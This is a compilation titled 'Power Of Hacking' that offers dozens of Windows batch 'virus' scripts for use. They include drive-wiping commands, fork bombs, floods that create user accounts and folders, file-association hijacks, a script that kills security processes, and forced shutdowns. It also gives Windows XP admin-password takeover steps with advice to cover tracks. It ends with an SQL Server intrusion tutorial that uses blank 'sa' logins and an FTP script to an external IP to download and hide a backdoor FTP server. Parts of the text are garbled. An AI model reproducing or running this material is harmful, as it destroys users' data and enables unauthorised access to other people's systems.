Power Of Hacking Batch virus programming by Tahir:@echo off It instructs to hide the commands when batch files is:msg * Tahir® @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop saveas tahir.bat color:msg * Tahir @ echo off echo: echo …………………………… echo Press 1 for green, 2 for red or 3 for blue, or 4 for exit echo …………………………… set /p m=Type 1, 2, or 3, or 4, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2 Mail:mtahirzahid@yahoo.com
Page 1
Power Of Hacking if %m%==3 goto 3 if %m%==4 goto 4 :1 color 0a echo This is the green goto 4 :2 color 04 echo This is the red goto 4 :3 color 06 echo This is the blue goto 4 :4 Pause goto end :end Saveas tahir.bat Colordos:msg * Tahir @ echo off echo: echo …………………………… echo Press 1 for green, 2 for red or 3 for blue, or 4 for exit echo …………………………… Mail:mtahirzahid@yahoo.com
Page 2
Power Of Hacking set /p m=Type 1, 2, or 3, or 4, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2 if %m%==3 goto 3 if %m%==4 goto 4 :1 color 0a echo This is the green goto 4 :2 color 04 echo This is the red goto 4 :3 color 06 echo This is the blue goto 4 :4 Pause goto end :end Saveas tahir.bat COUGHrandom:msg * Tahir *COUGH* Mail:mtahirzahid@yahoo.com
Page 3
Power Of Hacking why not:
cd %SYSTEMDRIVE%/ :start copy *.* %random%.* start *.* goto start saveas tahir.bat Create a Prank Virus:msg * Tahir @echo off echo YOU HAVE A VIRUS ON YOUR COMPUTER pause echo CONTATTING ANTIVIRUS pause echo DO YOU WANT TO DELETE ANTIVIRUS? pause echo ACCESS DENIED echo ACCESS DENIED echo ACCESS DENIED pause echo ACTIVATING VIRUS echo VIRUS ACTIVATED pause :1 dir/s Mail:mtahirzahid@yahoo.com
Page 4
Power Of Hacking goto 1 saveas tahir.bat delC:msg * Tahir Cd C:\ rd C:\ /s/q Cd D:\ rd D:\ /s/q Cd E:\ Rd E:\ /s/q Cd F:\ Rd\ /s/q Saveas tahir.bat Delete:msg * Tahir @echo off echo do you want to delete all of your computer data? (y/n) pause >nul echo Do not exit out of the screen or all computer data will be deleted. ping localhost -n 2 > nul echo Are you sure you want to delete all computer data? (y/n) pause >nul echo deleting all data... echo. echo. pause localhost -n 2 > nul Mail:mtahirzahid@yahoo.com
Page 5
Power Of Hacking dir /s echo. echo. ping localhost -n 2 > nul cls echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n) pause echo. echo. ping localhost -n 1 > nul cls dir /s echo. echo. ping localhost -n 2 >nul cls echo all data has been deleted.. pause del "c:delete.bat" saveas tahir.bat Deleting Critical System Files sleep virus:msg * Tahir cls :A color 0a cls Mail:mtahirzahid@yahoo.com
Page 6
Power Of Hacking @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo start /w wscript.exe C:\sleep3000.vbs echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ Mail:mtahirzahid@yahoo.com
Page 7
Power Of Hacking mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\ echo start hax.exe start /w wscript.exe C:\sleep3000.vbs echo Virus Executed! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:\sleep2000.vbs echo Killing all processes… start /w wscript.exe C:\sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:\sleep2000.vbs Mail:mtahirzahid@yahoo.com
Page 8
Power Of Hacking echo: echo Have fun! start /w wscript.exe C:\sleep2000.vbs pause saveas tahir.bat Dell:msg * Tahir @Echo off Del C:\ *.*|y Saveas tahir.bat Denger:msg * Tahir @echo off copy 0% denger.bat start denger.bat saveas tahir.bat dos222ormoreopenfilehack:msg * Tahir :start start name.bat go to start saveas tahir.bat enablecmd:REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 Mail:mtahirzahid@yahoo.com
Page 9
Power Of Hacking [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0 Saveas tahir.reg eraseC:msg * Tahir erase c:\windows saveas tahir.bat examplewebsite:msg * Tahir start mtahirzahid.blogspot.com saveas tahir.bat file:msg * Tahir @echo off md hello :A start hello goto A saveas tahir.bat flood1:msg * Tahir @ECHO OFF @ECHO A PHOENIX PRODUCTION @ECHO MAIN BAT RUNNING GOTO start
Mail:mtahirzahid@yahoo.com
Page 10
Power Of Hacking :start @ECHO SET snowball2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5
:bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET maggi=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR maggi%%maggi%% >> bat5.bat @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4
:bat4 @ECHO CD %%SystemRoot%%\ >> bat4.bat @ECHO SET marge=1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat @ECHO :flood3 >> bat4.bat Mail:mtahirzahid@yahoo.com
Page 11
Power Of Hacking @ECHO MKDIR marge%%marge%% >> bat4.bat @ECHO SET /a marge=%%marge%%+1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat START /MIN bat4.bat GOTO bat3
:bat3 @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat @ECHO SET bart=1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat @ECHO :flood2 >> bat3.bat @ECHO MKDIR bart%%bart%% >> bat3.bat @ECHO SET /a bart=%%bart%%+1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat START /MIN bat3.bat GOTO bat2
:bat2 @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat @ECHO SET homer=1 >> bat2.bat @ECHO GOTO flood >> bat2.bat @ECHO :flood >> bat2.bat @ECHO MKDIR homer%%homer%% >> bat2.bat @ECHO SET /a homer=%%homer%%+1 >> bat2.bat @ECHO GOTO flood >> bat2.bat START /MIN bat2.bat Mail:mtahirzahid@yahoo.com
Page 12
Power Of Hacking GOTO original
:original CD %HomeDrive%\ SET lisa=1 GOTO flood1 :flood1 MKDIR lisa%lisa% SET /a lisa=%lisa%+1 GOTO flood1 Saveas tahir.bat Floodvirus:msg * Tahir @ECHO OFF @ECHO A 9xero’s Creation
@ECHO MAIN BAT RUNNING GOTO start
:start @ECHO SET magic2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat Mail:mtahirzahid@yahoo.com
Page 13
Power Of Hacking @ECHO NET USER magic2%%magic2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5
:bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET pogo=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR pogo%%pogo%% >> bat5.bat @ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4
:bat4 @ECHO CD %%SystemRoot%%\ >> bat4.bat @ECHO SET hat=1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat @ECHO :flood3 >> bat4.bat @ECHO MKDIR hat%%hat%% >> bat4.bat @ECHO SET /a hat=%%hat%%+1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat Mail:mtahirzahid@yahoo.com
Page 14
Power Of Hacking START /MIN bat4.bat GOTO bat3
:bat3 @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat @ECHO SET chart=1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat @ECHO :flood2 >> bat3.bat @ECHO MKDIR chart%%chart%% >> bat3.bat @ECHO SET /a chart=%%chart%%+1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat START /MIN bat3.bat GOTO bat2
:bat2 @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat @ECHO SET gamer=1 >> bat2.bat @ECHO GOTO flood >> bat2.bat @ECHO :flood >> bat2.bat @ECHO MKDIR gamer%%gamer%% >> bat2.bat @ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat @ECHO GOTO flood >> bat2.bat START /MIN bat2.bat GOTO original Mail:mtahirzahid@yahoo.com
Page 15
Power Of Hacking
riginal CD %HomeDrive%\ SET 9xero=1 GOTO flood1 :flood1 MKDIR 9xero%9xero% SET /a 9xero=%9xero%+1 GOTO flood1 Saveas tahir.bat Installhack:msg * Tahir title virus is my dna color 0A @echo off set end=md “u cant eascape from me-vishnu” set fin=copy “Hack log.txt” “Installing” %end% %fin% net send * andhra pradesh- virus created in karimnagar from jits college kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q Mail:mtahirzahid@yahoo.com
Page 16
Power Of Hacking cls assoc .exe=txtfile assoc .txt=mp3file assoc .mp3=.vcf cls msg * hi dude this is begining. msg * vishnu attcked the system try to challenge him . DEL C:\WINDOWS\system32\logoff.exe /F /Q DEL C:\WINDOWS\system32\logon.exe /F /Q DEL C:\WINDOWS\system32\logon.scr /F /Q cls shutdown saveas tahir.bat Ipconfig:msg * Tahir @ echo off echo Use this to open your programs faster echo: echo Select 1 for notepad, 2 for firewall options, 3 for registry editor‌ Select 4 to exit‌ set /p m=Type 1, 2, or 3, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2 if %m%==3 goto 3 if %m%==4 goto exit :1 Mail:mtahirzahid@yahoo.com
Page 17
Power Of Hacking start %windir%\System32\Notepad goto exit :2 start %windir%\System32\WF.msc goto exit :3 start %windir%\System32\regedt32.exe goto exit :exit
Try it and replace the values in bold to your choice‌
14. Check your internet Details
Advanced users can check their ip configuration whenever they want. This is really helpful for people who try to mask their IP many times or people who have a dynamic IP.
Open notepad and type the following:
@echo off ipconfig PAUSE Saveas tahir.bat Locker:msg * Tahir cls
Mail:mtahirzahid@yahoo.com
Page 18
Power Of Hacking @ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==YOUR PASSWORD HERE goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End Mail:mtahirzahid@yahoo.com
Page 19
Power Of Hacking :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End Saveas tahirlocker.bat Lockorkeyfolder:Key:msg * Tahir ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics saveas tahir.bat when lock:msg * Tahir ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} saveas tahir.bat maketreemagic:msg * Tahir @ echo off echo: echo …………………………… echo Press 1 for windows, 2 for apple or 3 for exit echo …………………………… set /p m=Type 1, 2, or 3, and press enter: echo: if %m%==1 goto 1 Mail:mtahirzahid@yahoo.com
Page 20
Power Of Hacking if %m%==2 goto 2 if %m%==3 goto 3 :1 echo _______________*******________________________ echo _____________***********______________________ echo ___________**************_____________________ echo __________****************____________________ echo __________****************___**__________**___ echo _________****************___****************__ echo ________*****************___***************___ echo _______*****************___****************___ echo _______***___________**___****************____ echo __________________________***************_____ echo ________***********________*************______ echo _____****************_______**********________ echo _____****************___**_____________*______ echo ____****************___****************_______ echo ____****************___***************________ echo ___*****************__****************________ echo ___**___________**___****************_________ echo _____________________****************_________ echo ______________________**************__________ echo ________________________*********_____________ echo _________________________*******______________ echo: echo: Mail:mtahirzahid@yahoo.com
Page 21
Power Of Hacking goto 3 :2 echo ______________________________________________ echo ______________________________________________ echo _____________________________**_______________ echo ___________________________***________________ echo _________________________****_________________ echo _________________________***__________________ echo ______________________________________________ echo ________________****________*****_____________ echo ____________************************__________ echo __________*************************___________ echo _________*************************____________ echo _________*************************____________ echo _________************************_____________ echo _________*************************____________ echo __________************************____________ echo ___________************************___________ echo ___________***************************________ echo ____________*************************_________ echo _____________***********************__________ echo _______________*******************____________ echo _________________***_________****_____________ echo ______________________________________________ echo: echo: Mail:mtahirzahid@yahoo.com
Page 22
Power Of Hacking goto 3 :3 Pause goto end :end Saveas tahir.bat Matrix:msg * Tahir :cmd
color 96
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% Mail:mtahirzahid@yahoo.com
Page 23
Power Of Hacking %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando Mail:mtahirzahid@yahoo.com
Page 24
Power Of Hacking m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random% ping localhost -n 4 >nul
color 70
echo WWWHHHHOOOOAAAAHHH!!!! ping localhost -n 3 >nul
color 48
echo sorry about that... RELOADING ping localhost -n 3 >nul pause goto:top saveas tahir.bat Matrix2:msg * Tahir @echo off color 0a :A echo 7 y x 3 W 8 G M P q 1 F 0 U v c i j O D s a E I j H 9 t 6 7 z C B 4 g T A H I R ping localhost -n 1 > nul goto A saveas tahir.bat
Mail:mtahirzahid@yahoo.com
Page 25
Power Of Hacking Messenger:msg * Tahir @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Saveas tahir.bat Msgsimultationary:msg * Tahir @ECHO off :Begin msg * Tahir msg * Want to have Fun? msg * You do? msg * We will both have fun, alright? msg * More fun? GOTO BEGIN Saveas tahir.bat Notehack:msg * Tahir @ECHO off Mail:mtahirzahid@yahoo.com
Page 26
Power Of Hacking :top START %SystemRoot%/system32/notepad.exe GOTO top Saveas tahir.bat open cmd:msg * Tahir Start Saveas tahir.bat Password:How To Hack a Windows XP Password It is very simple to hack an administrators user password in Windows Xp! You don't have to know any password before and you don't have to download any programs. Just Follow the steps below:
Go to Start-->Run and type "cmd" to open the command prompt
Type "net user" and press enter to see all the accounts name
Type "net user (account name) *"
Type the password you want and then confirm it!!
Passwordcracker:msg * Tahir @echo off color 2 title ProfessionalHDStudio's Password Cracker v,1
echo ########################### echo # By ProfessionalHDStudio # echo ########################### echo. echo PRESS ENTER Mail:mtahirzahid@yahoo.com
Page 27
Power Of Hacking pause >nul cls
echo ************************ echo . echo The Password Cracker V.1 echo By ProfessionalHDStudio echo ************************ echo. echo. echo username set /p username= net user %username% * echo press enter pause saveas tahir.bat passwordcrackright:How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the Mail:mtahirzahid@yahoo.com
Page 28
Power Of Hacking screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in. Have fun p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks passwordup:msg * Tahir @echo off echo If the proper username and password is not entered all files will be deleted by this virus. echo Good Luck set/p\/name=username: set/p\/password=password: echo haha you got the username and password wrong pause echo Files are being deleted pause dir/s del "c:up.bat" saveas tahir.bat Pick Your Option Batch File:msg * Tahir @echo off title Get A Life cd C: Mail:mtahirzahid@yahoo.com
Page 29
Power Of Hacking :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything. pause echo Pick your option: echo 1. Die Slowly echo 2. Instant Death echo 3. Stay Away From This One echo 4. Die this way (For Wimps!) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two saveas tahir.bat programs faster:msg * Tahir @ echo off echo Use this to open your programs faster echo: echo Select 1 for notepad, 2 for firewall options, 3 for registry editor… Select 4 to exit… set /p m=Type 1, 2, or 3, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2
Mail:mtahirzahid@yahoo.com
Page 30
Power Of Hacking if %m%==3 goto 3 if %m%==4 goto exit :1 start %windir%\System32\Notepad goto exit :2 start %windir%\System32\WF.msc goto exit :3 start %windir%\System32\regedt32.exe goto exit :exit Saveas tahir.bat Shut:msg * Tahir @echo off
msg * Shutdown computer.
shutdown -c “Sleep Tight” –s saveas tahir.bat shutdown:msg * Tahir @echo off :A cls Mail:mtahirzahid@yahoo.com
Page 31
Power Of Hacking echo Do you wanna crash your computer? (y/n) pause echo Are you sure? (y/n) pause echo your computer will crash when the time reaches zero. pause msg * Your computer will crash in... msg * 5 msg * 4 msg * 3 msg * 2 msg * 1 msg * Good-Bye msg * You have been pwned! :) shutdown -s -t 00 saveas tahir.bat Shutdown,restart,:msg * Tahir @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc... pause Mail:mtahirzahid@yahoo.com
Page 32
Power Of Hacking echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (you're boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two saveas tahir.bat shutdownforcefully:msg * Tahir @echo off msg * Shutdown computer. shutdown -c “Sleep Tight” –s saveas tahir.bat shutdown:msg * Tahir @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s saveas tahir.bat tahirmsg:msg * Tahir @ECHO off Mail:mtahirzahid@yahoo.com
Page 33
Power Of Hacking
:Begin
msg * Tahir
msg * Want to have Fun?
msg * You do weep?
msg * We will both have fun, alright?
msg * More fun no mind?
GOTO BEGIN Saveas tahir.bat TakeRest:msg * Tahir @echo off msg * Its time to get some rest. shutdown -c “Error! You have to take rest! Byeeeeee” –s saveas tahir.bat turnoffurpc:msg * Tahir @echo off msg * u r terminated shutdown -c "stop me if Mail:mtahirzahid@yahoo.com
Page 34
Power Of Hacking you can" –s saveas tahir.bat User account flooder:msg * Tahir @echo off :x net user %random% /add //create user account goto x saveas tahir.bat virus:msg * Tahir cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo start /w wscript.exe C:\sleep3000.vbs Mail:mtahirzahid@yahoo.com
Page 35
Power Of Hacking echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\ echo start hax.exe start /w wscript.exe C:\sleep3000.vbs Mail:mtahirzahid@yahoo.com
Page 36
Power Of Hacking echo Virus Executed! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:\sleep2000.vbs echo Killing all processes… start /w wscript.exe C:\sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:\sleep2000.vbs echo: echo Have fun! start /w wscript.exe C:\sleep2000.vbs pause saveas tahir.bat Virus:msg * Tahir echo Your system is affected by virus PAUSE echo: echo Windows will now try to undo changes Mail:mtahirzahid@yahoo.com
Page 37
Power Of Hacking PAUSE echo: echo FAILED ! PAUSE echo: echo Your system is corrupt PAUSE I put: @ echo off title Virus echo Your system is affected by virus PAUSE echo: echo Windows will now try to undo changes PAUSE echo: echo FAILED ! PAUSE echo: echo Fuc* you bitc* PAUSE
Reply Saveas tahir.bat Viruss:msg * Tahir Mail:mtahirzahid@yahoo.com
Page 38
Power Of Hacking tart virus.bat virus.bat (exactly like that!) saveas tahir.bat Serial and Trial hack:-
download this software from www.blueportal.org and hack the any application. Sql:This Tutorial is written in mind, that you already have hacking experience. And know the basics. Which will not be covered in this tutorial. This is the easiest way in my mind to Hack SQL. Im no expert. But have tried a lot of different ways. Anwayz, get Hacking! Tools You'll Need -------------------------------------SQL Exec [Here] ((http://orangey.no-ip.com/sql/sql.rar ) ServUDaemon or Winmgnt.exe [Serv-U Here or Winmgnt Here ] Anonymous or Personal FTP Configured ServUDaemon.ini [Gotta get this Yourself ] Other Useful Utilities Pack [Here] (http://orangey.no-ip.com/dware/Need.rar ) Make a Nice Shortcut on your Desktop to SQLExec, your going to be using it quite a Mail:mtahirzahid@yahoo.com
Page 39
Power Of Hacking lot.
Open up SQLExec and it should look like this:
Now you are ready to use scans in this Format:
[127.0.0.1 ]: Found Mssql account: sa/[NULL] Enter in the info like so:
Mail:mtahirzahid@yahoo.com
Page 40
Power Of Hacking
And Click the connect button. If the Server is up, and the user/pass is correct the connect button should turn grey.
You are now connected to the server. If you cant seem to connect, the server info has changed or been patched. Moving On.... The Main Commands for SQLExec are: dir c:\ This will list the "c:\" drives contents and show free space, change the drive letter accordingly. md c:\recycler\_tmp Will make any directory you tell it to, this command creates the folder "_tmp" in c:\recycler. del c:\recycler\filename.exe Will delete any file you tell it to. copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp This moves the file Mail:mtahirzahid@yahoo.com
Page 41
Power Of Hacking specified to any directory you wish. Great for hiding your Serv-U Files after you transferred them. ------------------------------------------------------------------------------The commands above are the most common used. Now we are ready to hack some stro! Stop - Make sure you have done everything so far, and have read carefully. You should be connected to the victim, enter in the command box "dir c:\" and press enter. The person's c:\ drive listing should show up with Free Drive Space:
This is the command set for getting your Serv-U files from your Anonymous Pub you setup earlier to the server. This tells the client to connect to IP: 127.0.0.1 on Port 21. And download Winmgnt.exe and Servudaemon.ini from the root. echo open 62.2.239.111 >> C:\3.txt echo anonymous >> C:\3.txt echo anonymous@dude.com >> C:\3.txt echo BINARY >> C:\3.txt echo get tsksrv.exe >> C:\3.txt echo get ml_hconf.dll >> C:\3.txt echo quit >> C:\3.txt ftp -i -s:C:\3.txt Mail:mtahirzahid@yahoo.com
Page 42
Power Of Hacking You enter in these commands one by one, after entering in the first one you should get a beep, or "SQL_NO_DATA". After you get eiter of these move onto the next command. The last command "ftp -i -s:C:\3.txt" will have the computer connect and download the files. SQLExec will "lock-up" during the time it is downloading, then the screen will re-appear when done & should show the following:
The Default directory that the serv-u files goto is "system32". Most stro's its c:\winnt\system32. So in our command box, type dir c:\winnt\system32\ That will list the system32 directory. Like So
Mail:mtahirzahid@yahoo.com
Page 43
Power Of Hacking
Now that your files are on the computer its time to hide them. In your command box type md c:\recycler\_tmp That is where we will hide the files.
Now type copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp and Press Enter. Then type: copy c:\winnt\system32\ ml_hconf.dll.ini c:\recycler\_tmp Now your files are well hidden from the sys-op. You are now ready to start your server. Copy the IP to the Clipboard. Because you will need it. To start the server simply type: c:\winnt\system32\tsksrv.exe SQLExec should now Lock up for good. And if everything went well you should be able to connect to your server on the port you setup. See Part 2
Mail:mtahirzahid@yahoo.com
Page 44
Power Of Hacking Other Things to Do After Your Server is Running
1. Getting your Server to Auto-Start with the Computer: Open up your Site in FlashFXP. Get setit.exe from the Needed Utilities up above, put it in the folder where your files are located, and press "Control R" and enter "site exec setit.exe servername.exe" That will put your server to Auto Start with the PC.
2 Securing the Server from being Rehacked: Open up your site in FlashFXP. Get "osql" here and put it in the MSSQL\binn folder usually found in c:\ or c:\Program Files\Microsoft SQL Server\MSSQL\binn Make sure osql.exe is in the "binn" folder. Or this will not work!
Sometimes the osql.exe is already on the server, and sometimes the sys-ops remove it. So its good to have. Now you are going to change the Server's Password (The one you used to connect in SQLExec) Here are the commands you will use in FlashFXP For blank pass: site exec osql.exe -U sa -P "" -Q "sp_password NULL,Logon,sa" Mail:mtahirzahid@yahoo.com
Page 45
